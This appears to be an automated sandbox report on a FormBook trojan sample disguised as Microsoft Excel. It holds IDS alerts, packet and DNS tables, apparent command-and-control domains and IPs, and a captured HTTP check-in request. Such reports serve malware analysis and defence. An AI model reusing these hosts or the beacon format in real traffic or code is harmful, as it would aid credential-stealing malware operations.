                                                                        RT_ICON0xb09280x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xb4b500x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xb8d780x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xbcfa00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xc11c80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xc53f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_GROUP_ICON0xc96180x84data
                                                                        RT_VERSION0xc969c0x334data
                                                                        RT_MANIFEST0xc99d00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyrightExcel
                                                                        Assembly Version1.3.6.9
                                                                        InternalName5uoa.exe
                                                                        FileVersion1.3.6.9
                                                                        CompanyNameMicrosoft
                                                                        LegalTrademarksExcel
                                                                        CommentsExcel
                                                                        ProductNameMicrosoft
                                                                        ProductVersion1.3.6.9
                                                                        FileDescriptionExcel
                                                                        OriginalFilename5uoa.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        02/23/21-10:07:40.155996TCP1201ATTACK-RESPONSES 403 Forbidden804976123.227.38.74192.168.2.4
                                                                        02/23/21-10:07:50.751897TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                        02/23/21-10:07:56.064671TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4184.106.16.223
                                                                        02/23/21-10:07:56.064671TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4184.106.16.223
                                                                        02/23/21-10:07:56.064671TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4184.106.16.223
                                                                        02/23/21-10:08:08.227961TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4202.66.173.116
                                                                        02/23/21-10:08:08.227961TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4202.66.173.116
                                                                        02/23/21-10:08:08.227961TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4202.66.173.116
                                                                        02/23/21-10:08:23.806049TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.494.23.162.163
                                                                        02/23/21-10:08:23.806049TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.494.23.162.163
                                                                        02/23/21-10:08:23.806049TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.494.23.162.163

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 23, 2021 10:07:34.121632099 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.315769911 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.316106081 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.316319942 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.674912930 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.805005074 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.844446898 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844474077 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844491005 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844508886 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844638109 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.844691038 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.999042988 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.999223948 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:39.902426004 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:39.943226099 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:39.943336010 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:39.943531036 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:39.984626055 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.155996084 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156027079 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156047106 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156064987 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156079054 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156090975 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156156063 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:40.156194925 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:40.156296968 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:45.275333881 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.339850903 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.339967966 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.340125084 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.403935909 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.453417063 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.453454018 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.453608990 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.453644991 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.518780947 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:50.558042049 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.604201078 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.607954979 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.608117104 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.653506041 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.751897097 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.751960993 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.752162933 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.752336025 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.799853086 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:55.911919117 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.064290047 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.064481020 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.064671040 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.259236097 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.290729046 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.290755033 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.290901899 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.290935993 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.444189072 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:08:01.611073017 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:01.908994913 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:01.909262896 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:01.909493923 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:02.207236052 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:02.207866907 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:02.207880974 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:02.208501101 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:02.208548069 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:02.506582975 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:08.045314074 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.227328062 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.227575064 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.227961063 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.410000086 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.410028934 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.410331011 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.410443068 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.592272997 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.592480898 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:18.563910007 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.613535881 CET8049769160.153.136.3192.168.2.4
                                                                        Feb 23, 2021 10:08:18.613718987 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.614079952 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.663569927 CET8049769160.153.136.3192.168.2.4
                                                                        Feb 23, 2021 10:08:18.663773060 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.663826942 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.713541031 CET8049769160.153.136.3192.168.2.4
                                                                        Feb 23, 2021 10:08:23.760878086 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.805603981 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.805742979 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.806049109 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.850438118 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.850476980 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.850505114 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.850712061 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.850756884 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.895284891 CET804977094.23.162.163192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 23, 2021 10:06:16.121627092 CET53646468.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:18.085860014 CET6529853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:18.145257950 CET53652988.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:19.214610100 CET5912353192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:19.272248983 CET53591238.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:19.453921080 CET5453153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:19.515734911 CET53545318.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:20.101125002 CET4971453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:20.149836063 CET53497148.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:21.541256905 CET5802853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:21.590028048 CET53580288.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:22.953357935 CET5309753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:23.005038023 CET53530978.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:24.322851896 CET4925753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:24.382301092 CET53492578.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:25.776557922 CET6238953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:25.828144073 CET53623898.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:26.801522970 CET4991053192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:26.851269007 CET53499108.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:28.053173065 CET5585453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:28.104880095 CET53558548.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:32.821118116 CET6454953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:32.872729063 CET53645498.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:34.056159973 CET6315353192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:34.104953051 CET53631538.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:35.507694960 CET5299153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:35.558259010 CET53529918.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:38.171195030 CET5370053192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:38.222738981 CET53537008.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:39.643234015 CET5172653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:39.704479933 CET53517268.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:41.249780893 CET5679453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:41.306982040 CET53567948.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:50.383728981 CET5653453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:50.432409048 CET53565348.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:57.076761007 CET5662753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:57.128460884 CET53566278.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:58.234647036 CET5662153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:58.283346891 CET53566218.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:59.444823027 CET6311653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:59.493491888 CET53631168.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:00.622454882 CET6407853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:00.674197912 CET53640788.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:10.865366936 CET6480153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:10.924160957 CET53648018.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:22.158035040 CET6172153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:22.219904900 CET53617218.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:23.750588894 CET5125553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:23.823115110 CET53512558.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:24.475516081 CET6152253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:24.538213968 CET53615228.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:25.307122946 CET5233753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:25.369857073 CET53523378.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:25.831712008 CET5504653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:25.891031027 CET53550468.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:26.717438936 CET4961253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:26.774847031 CET53496128.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:27.568881035 CET4928553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:27.625801086 CET53492858.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:28.630475998 CET5060153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:28.687613010 CET53506018.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:28.787297964 CET6087553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:28.836028099 CET53608758.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:29.653798103 CET5644853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:29.736443996 CET53564488.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:30.457689047 CET5917253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:30.519557953 CET53591728.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:33.788086891 CET6242053192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:34.111540079 CET53624208.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:35.093751907 CET6057953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:35.152369976 CET53605798.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:39.826229095 CET5018353192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:39.901096106 CET53501838.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:45.170499086 CET6153153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:45.274060011 CET53615318.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:50.495853901 CET4922853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:50.556087017 CET53492288.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:55.765499115 CET5979453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:55.909749031 CET53597948.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:01.316922903 CET5591653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:01.609078884 CET53559168.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:07.241117001 CET5275253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:08.043203115 CET53527528.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:13.424010992 CET6054253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:13.486955881 CET53605428.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:15.674170971 CET6068953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:15.722968102 CET53606898.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:17.635176897 CET6420653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:17.703160048 CET53642068.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:18.501543045 CET5090453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:18.562619925 CET53509048.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:23.691322088 CET5752553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:23.758831978 CET53575258.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:28.857777119 CET5381453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:29.010719061 CET53538148.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:34.280643940 CET5341853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:34.656076908 CET53534188.8.8.8192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Feb 23, 2021 10:07:33.788086891 CET192.168.2.48.8.8.80xbdbfStandard query (0)www.fastenerspelosato.netA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:39.826229095 CET192.168.2.48.8.8.80x44b2Standard query (0)www.sissysundays.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.170499086 CET192.168.2.48.8.8.80xc969Standard query (0)www.whereinthezooareyou.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:50.495853901 CET192.168.2.48.8.8.80x124bStandard query (0)www.fertinvitro.doctorA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:55.765499115 CET192.168.2.48.8.8.80x84aStandard query (0)www.dgcsales.netA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:01.316922903 CET192.168.2.48.8.8.80xa3d7Standard query (0)www.horisan-touki.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:07.241117001 CET192.168.2.48.8.8.80xd8a9Standard query (0)www.karthikeyainfraindia.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:13.424010992 CET192.168.2.48.8.8.80x23bdStandard query (0)www.guilhermeoliveiro.siteA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:18.501543045 CET192.168.2.48.8.8.80x59b6Standard query (0)www.buysellleasewithlisa.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:23.691322088 CET192.168.2.48.8.8.80x6122Standard query (0)www.besteprobioticakopen.onlineA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:28.857777119 CET192.168.2.48.8.8.80x81e3Standard query (0)www.grandwhale.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:34.280643940 CET192.168.2.48.8.8.80xd8a3Standard query (0)www.smallbathroomdecor.infoA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Feb 23, 2021 10:07:34.111540079 CET8.8.8.8192.168.2.40xbdbfNo error (0)www.fastenerspelosato.net142.91.239.112A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:39.901096106 CET8.8.8.8192.168.2.40x44b2No error (0)www.sissysundays.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:39.901096106 CET8.8.8.8192.168.2.40x44b2No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)www.whereinthezooareyou.comwww9.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)www9.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:50.556087017 CET8.8.8.8192.168.2.40x124bNo error (0)www.fertinvitro.doctorfertinvitro.doctorCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:50.556087017 CET8.8.8.8192.168.2.40x124bNo error (0)fertinvitro.doctor34.102.136.180A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:55.909749031 CET8.8.8.8192.168.2.40x84aNo error (0)www.dgcsales.netdgcsales.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:55.909749031 CET8.8.8.8192.168.2.40x84aNo error (0)dgcsales.net184.106.16.223A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:01.609078884 CET8.8.8.8192.168.2.40xa3d7No error (0)www.horisan-touki.com118.27.99.84A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:08.043203115 CET8.8.8.8192.168.2.40xd8a9No error (0)www.karthikeyainfraindia.comkarthikeyainfraindia.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:08:08.043203115 CET8.8.8.8192.168.2.40xd8a9No error (0)karthikeyainfraindia.com202.66.173.116A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:13.486955881 CET8.8.8.8192.168.2.40x23bdName error (3)www.guilhermeoliveiro.sitenonenoneA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:18.562619925 CET8.8.8.8192.168.2.40x59b6No error (0)www.buysellleasewithlisa.combuysellleasewithlisa.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:08:18.562619925 CET8.8.8.8192.168.2.40x59b6No error (0)buysellleasewithlisa.com160.153.136.3A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:23.758831978 CET8.8.8.8192.168.2.40x6122No error (0)www.besteprobioticakopen.online94.23.162.163A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:29.010719061 CET8.8.8.8192.168.2.40x81e3No error (0)www.grandwhale.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:08:29.010719061 CET8.8.8.8192.168.2.40x81e3No error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:34.656076908 CET8.8.8.8192.168.2.40xd8a3No error (0)www.smallbathroomdecor.info88.214.207.96A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.fastenerspelosato.net
                                                                        • www.sissysundays.com
                                                                        • www.whereinthezooareyou.com
                                                                        • www.fertinvitro.doctor
                                                                        • www.dgcsales.net
                                                                        • www.horisan-touki.com
                                                                        • www.karthikeyainfraindia.com
                                                                        • www.buysellleasewithlisa.com
                                                                        • www.besteprobioticakopen.online

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449755142.91.239.11280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:34.316319942 CET2184OUTGET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.fastenerspelosato.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:34.844446898 CET2186INHTTP/1.1 500 Internal Server Error
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Server: Microsoft-IIS/8.5
                                                                        X-AspNet-Version: 4.0.30319
                                                                        X-Powered-By: ASP.NET
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Headers: *
                                                                        Access-Control-Allow-Methods: GET, POST
                                                                        Date: Tue, 23 Feb 2021 09:07:20 GMT
                                                                        Connection: close
                                                                        Content-Length: 4112
